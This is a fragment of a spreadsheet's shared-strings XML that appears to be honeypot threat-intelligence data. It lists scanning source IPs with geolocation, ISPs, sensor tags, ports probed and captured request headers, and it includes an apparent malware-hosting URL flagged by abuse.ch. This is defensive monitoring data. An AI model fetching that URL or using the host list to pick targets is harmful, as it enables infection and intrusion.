    <t>::ffff:75c6:959</t>
  </si>
  <si>
    <t>95d8f3b94fa16b9f10ea7e283fbc1af8</t>
  </si>
  <si>
    <t>197.217.142.191</t>
  </si>
  <si>
    <t>-8.81466</t>
  </si>
  <si>
    <t>13.2302</t>
  </si>
  <si>
    <t>11259</t>
  </si>
  <si>
    <t>Angola Telecom</t>
  </si>
  <si>
    <t>ClientesDiversos</t>
  </si>
  <si>
    <t>::ffff:c5d9:8ebf</t>
  </si>
  <si>
    <t>3c9e5de1b206a0b2c31337bcc7f6ab6d</t>
  </si>
  <si>
    <t>103.141.133.212</t>
  </si>
  <si>
    <t>Fazilka</t>
  </si>
  <si>
    <t>1271891</t>
  </si>
  <si>
    <t>30.4021</t>
  </si>
  <si>
    <t>74.0284</t>
  </si>
  <si>
    <t>AANS-AS-IN</t>
  </si>
  <si>
    <t>I T Solution</t>
  </si>
  <si>
    <t>::ffff:678d:85d4</t>
  </si>
  <si>
    <t>e7845680065db753b78e4e9d504d36c8</t>
  </si>
  <si>
    <t>196.189.39.163</t>
  </si>
  <si>
    <t>http://196.189.39.163:51858/i</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_DNS_H8&amp;&amp;SMA-LAB_MT-CPA_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;53&amp;&amp;14850</t>
  </si>
  <si>
    <t>::ffff:c4bd:27a3</t>
  </si>
  <si>
    <t>51d1c5b559ef6c9882f2d756b6db789f</t>
  </si>
  <si>
    <t>117.192.36.38</t>
  </si>
  <si>
    <t>::ffff:75c0:2426</t>
  </si>
  <si>
    <t>8ccdde52d9294edf87f6d739771d9224</t>
  </si>
  <si>
    <t>180.251.10.33</t>
  </si>
  <si>
    <t>TLKM_BB_SERVICE_180_251_DIVRE1</t>
  </si>
  <si>
    <t>::ffff:b4fb:a21</t>
  </si>
  <si>
    <t>c50aff2e085ce1badc2a64a8469a8e64</t>
  </si>
  <si>
    <t>117.206.4.11</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:75ce:40b</t>
  </si>
  <si>
    <t>8448198b9068396e119178bf3bca6f0a</t>
  </si>
  <si>
    <t>61.3.10.36</t>
  </si>
  <si>
    <t>::ffff:3d03:a24</t>
  </si>
  <si>
    <t>0a02c3f81bfc9036e1211a3465fab653</t>
  </si>
  <si>
    <t>14.237.106.80</t>
  </si>
  <si>
    <t>::ffff:eed:6a50</t>
  </si>
  <si>
    <t>abad341ab9223c0f99f805b0b084f5f5</t>
  </si>
  <si>
    <t>220.118.225.128</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;38386&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc76:e180</t>
  </si>
  <si>
    <t>b349c45f4f35fad42eb2b6e73be6273e</t>
  </si>
  <si>
    <t>60.249.3.202</t>
  </si>
  <si>
    <t>60-249-3-202.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;32177&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3cf9:3ca</t>
  </si>
  <si>
    <t>ac7c3a882617233d1e1d9ffed04345ce</t>
  </si>
  <si>
    <t>117.200.189.99</t>
  </si>
  <si>
    <t>::ffff:75c8:bd63</t>
  </si>
  <si>
    <t>b02a05b5d47a7680cdad6c810340fa27</t>
  </si>
  <si>
    <t>117.206.128.188</t>
  </si>
  <si>
    <t>::ffff:75ce:80bc</t>
  </si>
  <si>
    <t>a0c3340f3197ba9b8c70ca334ec100e6</t>
  </si>
  <si>
    <t>120.61.32.107</t>
  </si>
  <si>
    <t>Bharti International Singapore PTE LTD</t>
  </si>
  <si>
    <t>::ffff:783d:206b</t>
  </si>
  <si>
    <t>7cc965de6ef359f06f9f4b84a97e7790</t>
  </si>
  <si>
    <t>117.206.136.142</t>
  </si>
  <si>
    <t>::ffff:75ce:888e</t>
  </si>
  <si>
    <t>6a20867f66204daddc94699ad085bd1b</t>
  </si>
  <si>
    <t>210.165.142.168</t>
  </si>
  <si>
    <t>pl46760.ag2525.nttpc.ne.jp</t>
  </si>
  <si>
    <t>Kanagawa</t>
  </si>
  <si>
    <t>Yokohama</t>
  </si>
  <si>
    <t>Enokichō</t>
  </si>
  <si>
    <t>11081570</t>
  </si>
  <si>
    <t>35.4304</t>
  </si>
  <si>
    <t>139.614</t>
  </si>
  <si>
    <t>1997-08-04</t>
  </si>
  <si>
    <t>['ns1.sphere.ad.jp', 'ns2.sphere.ad.jp']</t>
  </si>
  <si>
    <t>::ffff:d2a5:8ea8</t>
  </si>
  <si>
    <t>5ce9affa386398187401735b060f0639</t>
  </si>
  <si>
    <t>59.182.183.232</t>
  </si>
  <si>
    <t>::ffff:3bb6:b7e8</t>
  </si>
  <si>
    <t>cd116641a906db31f078f695baa8013e</t>
  </si>
  <si>
    <t>117.199.5.99</t>
  </si>
  <si>
    <t>::ffff:75c7:563</t>
  </si>
  <si>
    <t>2f934ecb9d3637d93ca4a18ee2c71c1f</t>
  </si>
  <si>
    <t>61.3.114.246</t>
  </si>
  <si>
    <t>::ffff:3d03:72f6</t>
  </si>
  <si>
    <t>45d044b373cba92663a86611e5f24a5d</t>
  </si>
  <si>
    <t>118.36.136.191</t>
  </si>
  <si>
    <t>Sindaebang-dong</t>
  </si>
  <si>
    <t>8692590</t>
  </si>
  <si>
    <t>156-010</t>
  </si>
  <si>
    <t>37.4927</t>
  </si>
  <si>
    <t>::ffff:7624:88bf</t>
  </si>
  <si>
    <t>7d03dbd3a3cd3f757ace5b691a23f1fe</t>
  </si>
  <si>
    <t>87.19.131.249</t>
  </si>
  <si>
    <t>host-87-19-131-249.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>9100</t>
  </si>
  <si>
    <t>3169070</t>
  </si>
  <si>
    <t>00187</t>
  </si>
  <si>
    <t>41.9618</t>
  </si>
  <si>
    <t>12.4643</t>
  </si>
  <si>
    <t>Telecom Italia S.p.A. TIN EASY LITE</t>
  </si>
  <si>
    <t>{Data_PJL:NA}</t>
  </si>
  <si>
    <t>1996-01-29 00:00:00</t>
  </si>
  <si>
    <t>2026-01-29 00:00:00</t>
  </si>
  <si>
    <t>2025-02-14 00:53:45</t>
  </si>
  <si>
    <t>ns.telecomitalia.it
  dnsts.interbusiness.it</t>
  </si>
  <si>
    <t>Telecom Italia s.p.a.</t>
  </si>
  <si>
    <t>::ffff:5713:83f9</t>
  </si>
  <si>
    <t>09969674070f8a96be2ee797eb1736b8</t>
  </si>
  <si>
    <t>117.195.25.87</t>
  </si>
  <si>
    <t>::ffff:75c3:1957</t>
  </si>
  <si>
    <t>0fc2cc7e04f0e51bfca441b8f96d4919</t>
  </si>
  <si>
    <t>93.39.109.35</t>
  </si>
  <si>
    <t>NA&amp;&amp;93-39-109-35.ip75.fastwebnet.it</t>
  </si>
  <si>
    <t>Fastweb Comune DI Pomigliano D Arco</t>
  </si>
  <si>
    <t>2008-02-25</t>
  </si>
  <si>
    <t>2000-01-25 00:00:00</t>
  </si>
  <si>
    <t>2026-02-28 00:00:00</t>
  </si>
  <si>
    <t>2025-03-16 00:52:33</t>
  </si>
  <si>
    <t>dns3.fastweb.it
  dns4.fastweb.it</t>
  </si>
  <si>
    <t>Fastweb s.p.a.</t>
  </si>
  <si>
    <t>::ffff:5d27:6d23</t>
  </si>
  <si>
    <t>cf9340ecad5762735425b92d8e93697c</t>
  </si>
  <si>
    <t>130.204.213.101</t>
  </si>
  <si>
    <t>Plovdiv</t>
  </si>
  <si>
    <t>728193</t>
  </si>
  <si>
    <t>4000</t>
  </si>
  <si>
    <t>42.15</t>
  </si>
  <si>
    <t>24.75</t>
  </si>
  <si>
    <t>NEW-DOCSIS</t>
  </si>
  <si>
    <t>2011-10-26</t>
  </si>
  <si>
    <t>::ffff:82cc:d565</t>
  </si>
  <si>
    <t>a78291b35b6355d8bec8c5f533736dce</t>
  </si>
  <si>
    <t>117.208.238.96</t>
  </si>
  <si>
    <t>::ffff:75d0:ee60</t>
  </si>
  <si>
    <t>5b29a9c816cf9e44dbfaf2ed92d35648</t>
  </si>
  <si>
    <t>59.182.113.5</t>
  </si>
  <si>
    <t>::ffff:3bb6:7105</t>
  </si>
  <si>
    <t>7e8ea9504a42b303ff626a67160a22fe</t>
  </si>
  <si>
    <t>27.6.241.209</t>
  </si>
  <si>
    <t>::ffff:1b06:f1d1</t>
  </si>
  <si>
    <t>3278f119bd6191c111748dba11d4e74b</t>
  </si>
  <si>
    <t>96.84.107.181</t>
  </si>
  <si>
    <t>Chicago (Near South Side)</t>
  </si>
  <si>
    <t>60616</t>
  </si>
  <si>
    <t>41.8528</t>
  </si>
  <si>
    <t>-87.6232</t>
  </si>
  <si>
    <t>2008-02-21</t>
  </si>
  <si>
    <t>CABLE-1</t>
  </si>
  <si>
    <t>::ffff:6054:6bb5</t>
  </si>
  <si>
    <t>d18fee68a58dd1eb72f3b2592c57ed2f</t>
  </si>
  <si>
    <t>197.163.231.220</t>
  </si>
  <si>
    <t>Maadi</t>
  </si>
  <si>
    <t>Abū an Numrus</t>
  </si>
  <si>
    <t>362865</t>
  </si>
  <si>
    <t>29.9632</t>
  </si>
  <si>
    <t>31.2493</t>
  </si>
  <si>
    <t>24863</t>
  </si>
  <si>
    <t>LINKdotNET-AS</t>
  </si>
  <si>
    <t>Link Egypt (Link.NET)</t>
  </si>
  <si>
    <t>::ffff:c5a3:e7dc</t>
  </si>
  <si>
    <t>edb7f535451e86ea1159ac59bd5727a1</t>
  </si>
  <si>
    <t>117.205.115.61</t>
  </si>
  <si>
    <t>::ffff:75cd:733d</t>
  </si>
  <si>
    <t>0682abccbf7f4426d3ba431b609df35a</t>
  </si>
  <si>
    <t>59.88.51.82</t>
  </si>
  <si>
    <t>::ffff:3b58:3352</t>
  </si>
  <si>
    <t>4a322d30d18f33bb39cce9440fdb6d41</t>
  </si>
  <si>
    <t>191.59.87.84</t>
  </si>
  <si>
    <t>::ffff:bf3b:5754</t>
  </si>
  <si>
    <t>48c44cde26ab19c51a7d646270f44007</t>
  </si>
  <si>
    <t>117.217.85.69</t>
  </si>
  <si>
    <t>::ffff:75d9:5545</t>
  </si>
  <si>
    <t>36a8365f4cc13ec301b3d962f624313d</t>
  </si>
  <si>
    <t>12.169.6.180</t>
  </si>
  <si>
    <t>3057&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Balch Springs</t>
  </si>
  <si>
    <t>4672059</t>
  </si>
  <si>
    <t>32.7287</t>
  </si>
  <si>
    <t>-96.6228</t>
  </si>
  <si>
    <t>7018</t>
  </si>
  <si>
    <t>AT&amp;T Enterprises, LLC</t>
  </si>
  <si>
    <t>ONE RING NETWORKS INC-ORN</t>
  </si>
  <si>
    <t>1983-08-23</t>
  </si>
  <si>
    <t>ATT</t>
  </si>
  <si>
    <t>2025-03-18</t>
  </si>
  <si>
    <t>::ffff:ca9:6b4</t>
  </si>
  <si>
    <t>64c2c4f30abb274ce255bf9c1beba926</t>
  </si>
  <si>
    <t>101.109.106.3</t>
  </si>
  <si>
    <t>node-kxv.pool-101-109.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>Trat</t>
  </si>
  <si>
    <t>Laem Ngop</t>
  </si>
  <si>
    <t>1609283</t>
  </si>
  <si>
    <t>12.1717</t>
  </si>
  <si>
    <t>102.395</t>
  </si>
  <si>
    <t>::ffff:656d:6a03</t>
  </si>
  <si>
    <t>31d9b565ff3cecea02d76184cee6fe62</t>
  </si>
  <si>
    <t>117.207.161.176</t>
  </si>
  <si>
    <t>::ffff:75cf:a1b0</t>
  </si>
  <si>
    <t>0d4bc3493711c09d5956b03f0002e560</t>
  </si>
  <si>
    <t>45.178.130.96</t>
  </si>
  <si>
    <t>Salvador</t>
  </si>
  <si>
    <t>3450554</t>
  </si>
  <si>
    <t>-12.9756</t>
  </si>
  <si>
    <t>-38.491</t>
  </si>
  <si>
    <t>269025</t>
  </si>
  <si>
    <t>GmaX Telecomunicaçao</t>
  </si>
  <si>
    <t>::ffff:2db2:8260</t>
  </si>
  <si>
    <t>6c07b3a8179b32291751ad53f9cec04b</t>
  </si>
  <si>
    <t>117.243.109.4</t>
  </si>
  <si>
    <t>::ffff:75f3:6d04</t>
  </si>
  <si>
    <t>6906274e843233087fce9d1e69c426ca</t>
  </si>
  <si>
    <t>59.93.26.17</t>
  </si>
  <si>
    <t>::ffff:3b5d:1a11</t>
  </si>
  <si>
    <t>b8bd7a62ebd43199b0fc92b36ddf0512</t>
  </si>
  <si>
    <t>61.1.143.189</t>
  </si>
  <si>
    <t>::ffff:3d01:8fbd</t>
  </si>
  <si>
    <t>f986ba847440544c6bd1aa5fceac6537</t>
  </si>
  <si>
    <t>48.216.253.22</t>
  </si>
  <si>
    <t>MICROSOFT-CORP-MSN-AS-BLOCK</t>
  </si>
  <si>
    <t>::ffff:30d8:fd16</t>
  </si>
  <si>
    <t>97aa6b03ec3b10df92bc7a57aa745279</t>
  </si>
  <si>
    <t>18.97.5.55</t>
  </si>
  <si>
    <t>ec2-18-97-5-55.compute-1.amazonaws.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_H2&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>443&amp;&amp;21&amp;&amp;389&amp;&amp;6667&amp;&amp;3306&amp;&amp;NA&amp;&amp;6379</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;command&amp;&amp;request</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3069.112 Safari/537.32', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'VERSION', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;NA&amp;&amp;{Data_REDIS:NA}</t>
  </si>
  <si>
    <t>::ffff:1261:537</t>
  </si>
  <si>
    <t>16cf01193454d1350b3a55cfcd1a9be9</t>
  </si>
  <si>
    <t>48.216.249.225</t>
  </si>
  <si>
    <t>azpdegt6hh6x.stretchoid.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_FTP_H31</t>
  </si>
  <si>
    <t>143&amp;&amp;21&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:30d8:f9e1</t>
  </si>
  <si>
    <t>4128284438b6e2a7b5626aa2ed4e4314</t>
  </si>
  <si>
    <t>59.182.241.20</t>
  </si>
  <si>
    <t>::ffff:3bb6:f114</t>
  </si>
  <si>
    <t>da09b841a5db9ab6b546d88c89168aa8</t>
  </si>
  <si>
    <t>1.169.171.207</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-169-171-207.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:1a9:abcf</t>
  </si>
  <si>
    <t>e83aa9f2316b55919fd714c3a848b4e1</t>
  </si>
  <si>
    <t>117.235.52.128</t>
  </si>
  <si>
    <t>::ffff:75eb:3480</t>
  </si>
  <si>
    <t>333fb9c4b2451e34d323f322333cf90f</t>
  </si>
  <si>
    <t>123.193.145.57</t>
  </si>
  <si>
    <t>NA&amp;&amp;123-193-145-57.dynamic.kbronet.com.tw</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;18093&amp;&amp;23&amp;&amp;60647&amp;&amp;52800&amp;&amp;52845&amp;&amp;52870&amp;&amp;80&amp;&amp;NA&amp;&amp;60991</t>
  </si>
  <si>
    <t>121.571</t>
  </si>
  <si>
    <t>2006-12-22</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7bc1:9139</t>
  </si>
  <si>
    <t>2a281ea331006fed0a81cdd2c45e1bfe</t>
  </si>
  <si>
    <t>59.182.179.184</t>
  </si>
  <si>
    <t>::ffff:3bb6:b3b8</t>
  </si>
  <si>
    <t>d5e16b36d78b2802208f9f5c76ed96a5</t>
  </si>
  <si>
    <t>14.198.196.220</t>
  </si>
  <si>
    <t>014198196220.ctinets.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>2010-09-06</t>
  </si>
  <si>
    <t>::ffff:ec6:c4dc</t>
  </si>
  <si>
    <t>ae3b3203514b1f705b2096c53ce8ae47</t>
  </si>
  <si>
    <t>45.116.149.247</t>
  </si>
  <si>
    <t>ORANGEINFOCOM-IN-IN</t>
  </si>
  <si>
    <t>Fribzi Multi Technologies Pvt. Ltd.</t>
  </si>
  <si>
    <t>::ffff:2d74:95f7</t>
  </si>
  <si>
    <t>06e76595227ac8b3fead93f7ea868fb0</t>
  </si>
  <si>
    <t>117.221.206.219</t>
  </si>
  <si>
    <t>::ffff:75dd:cedb</t>
  </si>
  <si>
    <t>f1dc51dac46de4a0e014e7a4f542ab90</t>
  </si>
  <si>
    <t>117.253.8.214</t>
  </si>
  <si>
    <t>::ffff:75fd:8d6</t>
  </si>
  <si>
    <t>258acda58f5d36e17c0fa20de53144a7</t>
  </si>
  <si>
    <t>103.204.52.123</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;389&amp;&amp;64131&amp;&amp;57203&amp;&amp;55719&amp;&amp;53493&amp;&amp;53469&amp;&amp;53546&amp;&amp;53511&amp;&amp;53528&amp;&amp;53558&amp;&amp;49771&amp;&amp;50037&amp;&amp;50052&amp;&amp;50088&amp;&amp;49979&amp;&amp;50114&amp;&amp;50076&amp;&amp;50007&amp;&amp;50240&amp;&amp;50133&amp;&amp;50171&amp;&amp;50345&amp;&amp;56653&amp;&amp;56724&amp;&amp;56697&amp;&amp;56763&amp;&amp;56749&amp;&amp;56771&amp;&amp;59525&amp;&amp;59535&amp;&amp;59610&amp;&amp;59636&amp;&amp;59589&amp;&amp;59663&amp;&amp;59744&amp;&amp;59774&amp;&amp;59768&amp;&amp;59800&amp;&amp;59717&amp;&amp;59750&amp;&amp;59817&amp;&amp;59855&amp;&amp;59880&amp;&amp;51628&amp;&amp;51654&amp;&amp;51643&amp;&amp;51693</t>
  </si>
  <si>
    <t>Indore</t>
  </si>
  <si>
    <t>Indore (Race Course Road)</t>
  </si>
  <si>
    <t>1269743</t>
  </si>
  <si>
    <t>452001</t>
  </si>
  <si>
    <t>22.723</t>
  </si>
  <si>
    <t>75.882</t>
  </si>
  <si>
    <t>59165</t>
  </si>
  <si>
    <t>Auspice Infratel Pvt. Ltd.</t>
  </si>
  <si>
    <t>RB5</t>
  </si>
  <si>
    <t>2015-12-07</t>
  </si>
  <si>
    <t>AUSPICE</t>
  </si>
  <si>
    <t>::ffff:67cc:347b</t>
  </si>
  <si>
    <t>98a23940c576bfd87de3ffcee5c4b5f3</t>
  </si>
  <si>
    <t>59.92.175.49</t>
  </si>
  <si>
    <t>::ffff:3b5c:af31</t>
  </si>
  <si>
    <t>a9ae69c0b89d418ddcfadffe47272a0e</t>
  </si>
  <si>
    <t>61.0.88.255</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>40685&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:3d00:58ff</t>
  </si>
  <si>
    <t>edbedc2aea73302c0e2230db43d8914e</t>
  </si>
  <si>
    <t>117.207.170.255</t>
  </si>
  <si>
    <t>::ffff:75cf:aaff</t>
  </si>
  <si>
    <t>168e4666ff6c8fb0662b2c9a7839c886</t>
  </si>
  <si>
    <t>103.17.90.4</t>
  </si>
  <si>
    <t>VNTT</t>
  </si>
  <si>
    <t>2013-02-27</t>
  </si>
  <si>
    <t>VNTT-VN</t>
  </si>
  <si>
    <t>::ffff:6711:5a04</t>
  </si>
  <si>
    <t>223132c2a88fd2f336f7b33d5945b1b1</t>
  </si>
  <si>
    <t>27.0.217.42</t>
  </si>
  <si>
    <t>Sikar</t>
  </si>
  <si>
    <t>Neem ka Thana</t>
  </si>
  <si>
    <t>1261342</t>
  </si>
  <si>
    <t>27.7398</t>
  </si>
  <si>
    <t>75.7865</t>
  </si>
  <si>
    <t>2016-02-02</t>
  </si>
  <si>
    <t>::ffff:1b00:d92a</t>
  </si>
  <si>
    <t>79007c7c4966bb600dab8861f517505f</t>
  </si>
  <si>
    <t>117.199.34.49</t>
  </si>
  <si>
    <t>::ffff:75c7:2231</t>
  </si>
  <si>
    <t>81679b67ef92152a8e764e4da379bcce</t>
  </si>
  <si>
    <t>117.202.187.108</t>
  </si>
  <si>
    <t>::ffff:75ca:bb6c</t>
  </si>
  <si>
    <t>8290c54c85a4e7bfb62d186aed53b16b</t>
  </si>
  <si>
    <t>101.108.74.27</t>
  </si>
  <si>
    <t>::ffff:656c:4a1b</t>
  </si>
  <si>
    <t>b099b70b2ebcf90889b29d1c5da5665d</t>
  </si>
  <si>
    <t>117.243.242.245</t>
  </si>
  <si>
    <t>::ffff:75f3:f2f5</t>
  </si>
  <si>
    <t>772858d09f1f5c75f79dfc68928a630f</t>
  </si>
  <si>
    <t>117.216.25.22</t>
  </si>
  <si>
    <t>::ffff:75d8:1916</t>
  </si>
  <si>
    <t>32dd7ab739a51c272609e35ce16125b3</t>
  </si>
  <si>
    <t>220.135.236.223</t>
  </si>
  <si>
    <t>::ffff:dc87:ecdf</t>
  </si>
  <si>
    <t>dac18b756751490519eb4e0d90e0e3e5</t>
  </si>
  <si>
    <t>211.104.37.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;46447&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:d368:2562</t>
  </si>
  <si>
    <t>020030283bb4c9cc60016ecb7b151e27</t>
  </si>
  <si>
    <t>175.111.181.77</t>
  </si>
  <si>
    <t>3306&amp;&amp;1433&amp;&amp;445&amp;&amp;63216&amp;&amp;63271</t>
  </si>
  <si>
    <t>2016-01-29</t>
  </si>
  <si>
    <t>CIFYIT</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (175.111.181.77,64582)}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:af6f:b54d</t>
  </si>
  <si>
    <t>14f34c44d1a7660fcd0fdd42ce704c15</t>
  </si>
  <si>
    <t>59.91.32.51</t>
  </si>
  <si>
    <t>::ffff:3b5b:2033</t>
  </si>
